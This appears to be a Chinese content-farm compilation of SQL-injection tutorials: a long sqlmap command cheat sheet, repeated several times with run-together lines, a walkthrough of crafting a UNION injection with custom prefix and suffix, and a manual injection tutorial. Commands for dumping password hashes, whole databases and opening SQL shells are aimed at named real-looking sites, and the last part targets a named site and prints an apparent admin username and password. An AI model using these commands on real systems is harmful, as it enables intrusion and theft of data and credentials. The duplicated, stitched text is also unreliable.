当前位置：首页 > 范文大全 > 实用文>sqlmap 注入命令脚本安全

sqlmap 注入命令脚本安全

2024-10-14 08:02:53 收藏本文下载本文

“angus”通过精心收集，向本站投稿了5篇sqlmap 注入命令脚本安全，下面是小编为大家整理后的sqlmap 注入命令脚本安全，仅供大家参考借鉴，希望大家喜欢，并能积极分享!

sqlmap 注入命令脚本安全

篇1：sqlmap 注入命令脚本安全

工具提供sqlmap0.9版本、、

获取数据库名

./sqlmap.py -u “www.xx.php?nid=14550″

–user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0;

.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR

3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” –dbs

获取表名

./sqlmap.py -u “www.xxx.php?nid=14550″

–user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0;

.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR

3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” -D database

–tables

获取列名

./sqlmap.py -u “www.xxx.php?nid=14550″

–user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0;

.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR

3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” -D database -T

cdb_adminactions –columns

获取值

./sqlmap.py -u “www.xxx.php?nid=14550″

–user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0;

.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR

3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” -D database -T

cdb_members -C username,password –dump

svn checkout svn.sqlmap.org/sqlmap/trunk/sqlmap

sqlmap-dev

sqlmap.py -u “www.islamichina.com/hotelinchina.asp?cityid=2&m=1″

-v 1 –sql-shell //执行SQL语句

sqlmap.py -u “www.islamichina.com/hotelinchina.asp?cityid=2&m=1″

-v 5 //更详细的信息

load options from a configuration INI file

sqlmap -c

sqlmap.conf

使用POST方法提交

sqlmap.py -u “www.myhack58.com/sqlmap/oracle/post_int.php”

–method POST –data “id=1″

使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/cookie_int.php”

–cookie “id=1″ -v 1

使用referer欺骗

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

–referer “www.google.com” -v 3

使用自定义user-agent,或者使用随机使用自带的user-agents.txt

python sqlmap.py -u “www.myhack58.com/sqlmap/oracle/get_int.php?id=1″

–user-agent “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)” -v

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

-v 1 -a “./txt/user-agents.txt”

使用基本认证

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/basic/get_int.php?id=1″

–auth-type Basic –auth-cred “testuser:testpass” -v 3

使用Digest认证

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/digest/get_int.php?id=1″

–auth-type Digest –auth-cred “testuser:testpass” -v 3

使用代理,配合TOR

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

–proxy “192.168.1.47:3128″

python

sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

–proxy “192.168.1.47:8118″

使用多线程猜解

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

-v 1 –current-user –threads 3

绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

-v 1 -p “id

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1&cat=2″

-v 1 -p “cat,id”

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/ua_str.php”

-v 1 -p “user-agent” –user-agent “sqlmap/0.7rc1 (sqlmap.sourceforge.net)”

指定数据库,绕过SQLMAP的自动检测

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

-v 2 –dbms “PostgreSQL”

* MySQL

* oracle

* PostgreSQL

Microsoft SQL Server

指定操作系统,绕过SQLMAP自动检测

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

-v 2 –os “Windows”

* Linux

* Windows

自定义payload

Options:

–prefix and –postfix

In some circumstances the vulnerable parameter is

exploitable only if the user provides a postfix to be appended to the injection

payload. Another scenario where these options come handy presents itself when

the user already knows that query syntax and want to detect and exploit the SQL

injection by directly providing a injection payload prefix and/or

postfix.

Example on a MySQL 5.0.67 target on a page where the SQL query

is: $query = “Select * FROM users Where id=(‘” . $_GET['id'] . “‘) LIMIT 0,

1″;:

$ python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_str_brackets.php?id=1″

-v 3 -p “id” –prefix “‘” –postfix “AND

‘test’='test”

[...]

[hh:mm:16] [INFO] testing sql injection on GET

parameter ‘id’ with 0 parenthesis

[hh:mm:16] [INFO] testing custom injection

on GET parameter ‘id’

[hh:mm:16] [TRAFFIC OUT] HTTP request:

GET

/sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20

%28%27test%27=%27test

HTTP/1.1

Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7

Host:

www.myhack58.com:80

Accept-language: en-us,en;q=0.5

Accept:

text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,

image/png,*/*;q=0.5

User-agent:

sqlmap/0.7rc1 (sqlmap.sourceforge.net)

Connection:

[...]

[hh:mm:17] [INFO] GET parameter ‘id’ is custom

injectable

[...]

As you can see, the injection payload for testing for

custom injection

is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which

URL decoded is:

id=1′) AND 7433=7433 AND (‘test’='test

and makes

the query syntatically correct to the page query:

Select * FROM users

Where id=(’1′) AND 7433=7433 AND (‘test’='test’) LIMIT 0, 1

In this

simple example, sqlmap could detect the SQL injection and exploit it without

need to provide a custom injection payload, but sometimes in the real world

application it is necessary to provide it.

页面比较

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1″

–string “luther” -v 1

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1″

–regexp “ lu[w][w]er” -v

排除网站的内容

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1″

–excl-reg “Dynamic content: ([d]+)”

多语句测试，php内嵌函数mysql_query,不支持多语句

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

–stacked-test -v 1

union注入测试

python sqlmap.py -u “www.myhack58.com/sqlmap/oracle/get_int.php?id=1″

–union-test -v 1

unionz注入配合orderby

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_str.php?id=1″

–union-test –union-tech orderby -v 1

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1″

-v 1 –union-use –banner

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

-v 5 –union-use –current-user

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_partialunion.php?id=1″

-v 1 –union-use –dbs

fingerprint

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1″

-v 1 -f

python sqlmap.py -u “192.168.123.36/sqlmap/get_str.asp?name=luther”

-v 1 -f -b

判断当前用户是否是dba

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

–is-dba -v 1

列举数据库用户

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

–users -v 0

列举数据库用户密码

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

–passwords -v 0

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1″

–passwords -U sa -v 0

查看用户权限

python sqlmap.py -u “www.myhack58.com/sqlmap/oracle/get_int.php?id=1″

–privileges -v 0

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

–privileges -U postgres -v 0

列数据库

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1″

–dbs -v 0

列出指定数据库指定表的列名

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

–columns -T users -D test -v 1

列出指定数据库的指定表的指定列的内容

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1″

–dump -T users -D master -C surname -v 0

指定列的范围从2－4

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

–dump -T users -D test –start 2 –stop 4 -v 0

导出所有数据库，所有表的内容

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

–dump-all -v 0

只列出用户自己新建的数据库和表的内容

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1″

–dump-all –exclude-sysdbs -v 0

sql query

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

–sql-query “Select usename FROM pg_user” -v 0

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

–sql-query “Select host, password FROM mysql.user LIMIT 1, 3″ -v

Select usename, passwd FROM pg_shadow orDER BY usename

保存和恢复会话

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

-b -v 1 -s “sqlmap.log”

保存选项到INC配置文件

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

-b -v 1 –save

获取数据库名：

./sqlmap.py -u “www.xx.php?nid=14550” --user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” --dbs

获取表名：

./sqlmap.py -u “www.xxx.php?nid=14550” --user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” -D database --tables

获取列名

获取值

更新

svn checkout svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

sqlmap.py -u “www.islamichina.com/hotelinchina.asp?cityid=2&m=1” -v 1 --sql-shell //执行SQL语句

sqlmap.py -u “www.islamichina.com/hotelinchina.asp?cityid=2&m=1” -v 5 //更详细的信息

load options from a configuration INI file

sqlmap -c sqlmap.conf

使用POST方法提交

sqlmap.py -u “www.myhack58.com/sqlmap/oracle/post_int.php” --method POST --data “id=1”

使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/cookie_int.php” --cookie “id=1” -v 1

使用referer欺骗

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --referer “www.google.com” -v 3

使用自定义user-agent,或者使用随机使用自带的user-agents.txt

python sqlmap.py -u “www.myhack58.com/sqlmap/oracle/get_int.php?id=1” --user-agent “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)” -v 3

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” -v 1 -a “./txt/user-agents.txt”

使用基本认证

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/basic/get_int.php?id=1” --auth-type Basic --auth-cred “testuser:testpass” -v 3

使用Digest认证

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/digest/get_int.php?id=1” --auth-type Digest --auth-cred “testuser:testpass” -v 3

使用代理,配合TOR

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --proxy “192.168.1.47:3128”

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --proxy “192.168.1.47:8118”

使用多线程猜解

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” -v 1 --current-user --threads 3

绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” -v 1 -p “id

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1&cat=2“ -v 1 -p ”cat,id“

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/ua_str.php“ -v 1 -p ”user-agent“ --user-agent ”sqlmap/0.7rc1 (sqlmap.sourceforge.net)“

指定数据库,绕过SQLMAP的自动检测

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ -v 2 --dbms ”PostgreSQL“

* MySQL

* oracle

* PostgreSQL

* Microsoft SQL Server

指定操作系统,绕过SQLMAP自动检测

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ -v 2 --os ”Windows“

* Linux

* Windows

自定义payload

Options: --prefix and --postfix

In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix.

Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = ”Select * FROM users Where id=('“ . $_GET['id'] . ”') LIMIT 0, 1“;:

$ python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_str_brackets.php?id=1“ -v 3 -p ”id“ --prefix ”'“ --postfix ”AND 'test'='test“

[...]

[hh:mm:16] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis

[hh:mm:16] [INFO] testing custom injection on GET parameter 'id'

[hh:mm:16] [TRAFFIC OUT] HTTP request:

GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20

%28%27test%27=%27test HTTP/1.1

Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7

Host: www.myhack58.com:80

Accept-language: en-us,en;q=0.5

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,

image/png,*/*;q=0.5

User-agent: sqlmap/0.7rc1 (sqlmap.sourceforge.net)

Connection: close

[...]

[hh:mm:17] [INFO] GET parameter 'id' is custom injectable

[...]

As you can see, the injection payload for testing for custom injection is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL decoded is:

id=1') AND 7433=7433 AND ('test'='test

and makes the query syntatically correct to the page query:

Select * FROM users Where id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1

In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.

页面比较

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1“ --string ”luther“ -v 1

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1“ --regexp ”lu[w][w]er“ -v

排除网站的内容

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1“ --excl-reg ”Dynamic content: ([d]+)“

多语句测试，php内嵌函数mysql_query(),不支持多语句

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ --stacked-test -v 1

union注入测试

python sqlmap.py -u ”www.myhack58.com/sqlmap/oracle/get_int.php?id=1“ --union-test -v 1

unionz注入配合orderby

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_str.php?id=1“ --union-test --union-tech orderby -v 1

python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/get_int.php?id=1“ -v 1 --union-use --banner

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ -v 5 --union-use --current-user

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int_partialunion.php?id=1“ -v 1 --union-use --dbs

fingerprint

python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/get_int.php?id=1“ -v 1 -f

python sqlmap.py -u ”192.168.123.36/sqlmap/get_str.asp?name=luther“ -v 1 -f -b

判断当前用户是否是dba

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --is-dba -v 1

列举数据库用户

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --users -v 0

列举数据库用户密码

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ --passwords -v 0

python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/get_int.php?id=1“ --passwords -U sa -v 0

查看用户权限

python sqlmap.py -u ”www.myhack58.com/sqlmap/oracle/get_int.php?id=1“ --privileges -v 0

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --privileges -U postgres -v 0

列数据库

python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/get_int.php?id=1“ --dbs -v 0

列出指定数据库指定表的列名

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ --columns -T users -D test -v 1

列出指定数据库的指定表的指定列的内容

python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/get_int.php?id=1“ --dump -T users -D master -C surname -v 0

指定列的范围从2－4

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ --dump -T users -D test --start 2 --stop 4 -v 0

导出所有数据库，所有表的内容

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ --dump-all -v 0

只列出用户自己新建的数据库和表的内容

python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/get_int.php?id=1“ --dump-all --exclude-sysdbs -v 0

sql query

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --sql-query ”Select usename FROM pg_user“ -v 0

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ --sql-query ”Select host, password FROM mysql.user LIMIT 1, 3“ -v 1

Select usename, passwd FROM pg_shadow orDER BY usename

保存和恢复会话

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ -b -v 1 -s ”sqlmap.log“

保存选项到INC配置文件

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ -b -v 1 --save

获取数据库名

./sqlmap.py -u ”www.xx.php?nid=14550“ --user-agent ”Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)“ --dbs获取表名

./sqlmap.py -u ”www.xxx.php?nid=14550“ --user-agent ”Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)“ -D database --tables

获取列名

获取值

来源：影子

更新

svn checkout svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-devsqlmap.py -u ”www.islamichina.com/hotelinchina.asp?cityid=2&m=1“ -v 1 --sql-shell //执行SQL语句

sqlmap.py -u ”www.islamichina.com/hotelinchina.asp?cityid=2&m=1“ -v 5 //更详细的信息

load options from a configuration INI file

sqlmap -c sqlmap.conf使用POST方法提交

sqlmap.py -u ”www.myhack58.com/sqlmap/oracle/post_int.php“ --method POST --data ”id=1“使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies

python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/cookie_int.php“ --cookie ”id=1“ -v 1使用referer欺骗

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --referer ”www.google.com“ -v 3使用自定义user-agent,或者使用随机使用自带的user-agents.txt

python sqlmap.py -u ”www.myhack58.com/sqlmap/oracle/get_int.php?id=1“ --user-agent ”Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)“ -v 3python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ -v 1 -a ”./txt/user-agents.txt“

使用基本认证

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/basic/get_int.php?id=1“ --auth-type Basic --auth-cred ”testuser:testpass“ -v 3使用Digest认证

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/digest/get_int.php?id=1“ --auth-type Digest --auth-cred ”testuser:testpass“ -v 3使用代理,配合TOR

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --proxy ”192.168.1.47:3128“

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --proxy ”192.168.1.47:8118“使用多线程猜解

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ -v 1 --current-user --threads 3绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ -v 1 -p ”id

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1&cat=2” -v 1 -p “cat,id”

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/ua_str.php” -v 1 -p “user-agent” --user-agent “sqlmap/0.7rc1 (sqlmap.sourceforge.net)”指定数据库,绕过SQLMAP的自动检测

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” -v 2 --dbms “PostgreSQL”* MySQL

* oracle

* PostgreSQL

* Microsoft SQL Server指定操作系统,绕过SQLMAP自动检测

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” -v 2 --os “Windows”* Linux

* Windows自定义payload

Options: --prefix and --postfixIn some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix.

Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = “Select * FROM users Where id=('” . $_GET['id'] . “') LIMIT 0, 1”;:

$ python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_str_brackets.php?id=1” -v 3 -p “id” --prefix “'” --postfix “AND 'test'='test”

[...]

[hh:mm:16] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis

[hh:mm:16] [INFO] testing custom injection on GET parameter 'id'

[hh:mm:16] [TRAFFIC OUT] HTTP request:

GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20

%28%27test%27=%27test HTTP/1.1

Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7

Host: www.myhack58.com:80

Accept-language: en-us,en;q=0.5

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,

image/png,*/*;q=0.5

User-agent: sqlmap/0.7rc1 (sqlmap.sourceforge.net)

Connection: close

[...]

[hh:mm:17] [INFO] GET parameter 'id' is custom injectable

[...]As you can see, the injection payload for testing for custom injection is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL decoded is:

id=1') AND 7433=7433 AND ('test'='test

and makes the query syntatically correct to the page query:

Select * FROM users Where id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1

页面比较

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1” --string “luther” -v 1

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1” --regexp “lu[w][w]er” -v排除网站的内容

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1” --excl-reg “Dynamic content: ([d]+)”多语句测试，php内嵌函数mysql_query(),不支持多语句

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” --stacked-test -v 1union注入测试

python sqlmap.py -u “www.myhack58.com/sqlmap/oracle/get_int.php?id=1” --union-test -v 1unionz注入配合orderby

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_str.php?id=1” --union-test --union-tech orderby -v 1python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1” -v 1 --union-use --banner

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” -v 5 --union-use --current-user

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_partialunion.php?id=1” -v 1 --union-use --dbsfingerprint

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1” -v 1 -f

python sqlmap.py -u “192.168.123.36/sqlmap/get_str.asp?name=luther” -v 1 -f -b判断当前用户是否是dba

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --is-dba -v 1列举数据库用户

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --users -v 0

列举数据库用户密码

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” --passwords -v 0

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1” --passwords -U sa -v 0查看用户权限

python sqlmap.py -u “www.myhack58.com/sqlmap/oracle/get_int.php?id=1” --privileges -v 0

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --privileges -U postgres -v 0列数据库

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1” --dbs -v 0列出指定数据库指定表的列名

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” --columns -T users -D test -v 1列出指定数据库的指定表的指定列的内容

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1” --dump -T users -D master -C surname -v 0指定列的范围从2－4

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” --dump -T users -D test --start 2 --stop 4 -v 0导出所有数据库，所有表的内容

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” --dump-all -v 0只列出用户自己新建的数据库和表的内容

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1” --dump-all --exclude-sysdbs -v 0sql query

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --sql-query “Select usename FROM pg_user” -v 0

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” --sql-query “Select host, password FROM mysql.user LIMIT 1, 3” -v 1Select usename, passwd FROM pg_shadow orDER BY usename

保存和恢复会话

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” -b -v 1 -s “sqlmap.log”保存选项到INC配置文件

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” -b -v 1 --save

篇2：自定义sqlmap注入语句进行高级注入脚本安全

现在能够帮助我们进行sql注入检测的工具越来越多，但我认为，通用性最强的还是sqlmap，其他工具在灵活性上远远不及sqlmap，sql注入有许多类型，其中最喜欢的当然是能够union查询的，比blind类型的不知道爽到哪里去了。

现在有一个url已知存在sql注入漏洞，我们丢到sqlmap里面，跑一下，结果是这样的

sqlmap -u “www.ooxx.com/ooxx.php?xid=93&dxxx=news&action=find&ppid=2” -p ppid

很明显，是一些比较恶心的注入类型，bind和error-based，难道我们就只能听工具的了么，我们手动来看一看。sq报错如下

MySQL Error

Message: MySQL Query Error

SQL: select ..... and pass=0 and (c.catid=2\' or c.parentid=2\') and subject like '%%'

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' or c.parentid=2\') and subject like '%%'' at line 4

Errno.: 1064

Click here to seek help.

报错显示，这里懂sql语句有点复杂并且不是常规懂类型，需要闭合括号还有最好屏蔽掉后面的like语句，构造一下

www.ooxx.com/ooxx.php?xid=93&dxxx=news&action=find&ppid=2) order by 15 --

www.ooxx.com/ooxx.php?xid=93&dxxx=news&action=find&ppid=2) order by 16 --

order by确认了查出来懂总共16条，那么，继续试试

www.ooxx.com/ooxx.php?xid=93&dxxx=news&action=find&ppid=2) and 1=2 union% select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15 --

手工确认之后，使用sqlmap来继续进行，我们需要用到sqlmap的两个选项，suffix和prefix，添加以下语句的前缀和后缀，

sqlmap -u “www.ooxx.com/ooxx.php?xid=93&dxxx=news&action=find&ppid=2” -p catid --suffix=“ -- ” --prefix=“)”

成功自定义了注入的语句，出现来union类型的注入。

篇3：手工注入脚本安全

现在注入工具横行,自动化的程度已经...不能再自动了.

很多人会熟练的使用啊D,明小子之类的自动注入工具.以为自己就会了...

注入的原理呢.什么是注入.为什么会造成注入.过程...等.

你知道吗?你有没有试过真正的手工注入?没吧.

现在就利用我写的手工注入工具来讲解一下总体手工注入过程.

先找个有注入漏洞的站.很简单满大街都是.

www.jinhu168.com/A3/NewsInfo.asp?id=75

manage_User

username admin

password bfpms

id 35

已经找好了.这是一个标准欠黑型网站.安全度就不用说了.

www.jinhu168.com/A3/NewsInfo.asp?id=75

有注入漏洞的地址.检查一下.

基本确定可能有漏洞.继续.

www.jinhu168.com/A3/NewsInfo.asp?id=75 and exists (select * from manage_User)

查询manage_User这个表名是否存在.

不好意思.这工具老出错...录制这个工具不怎么好用.有好用的有空介绍个啊....

好了继续.

manage_User 存在...页面返回正常...

名字改了下`不存在就返回错误的页面`

这里是给你填写提示语句用的`不用的话清空就行了.

继续.

返回正常.说明存在.继续.等等`听电话`

不好意思.

不是1位哦`回显错误.呵呵`5位的`回显正常`

这样我们就知道他很多东西了`表..项..还有内容长度.

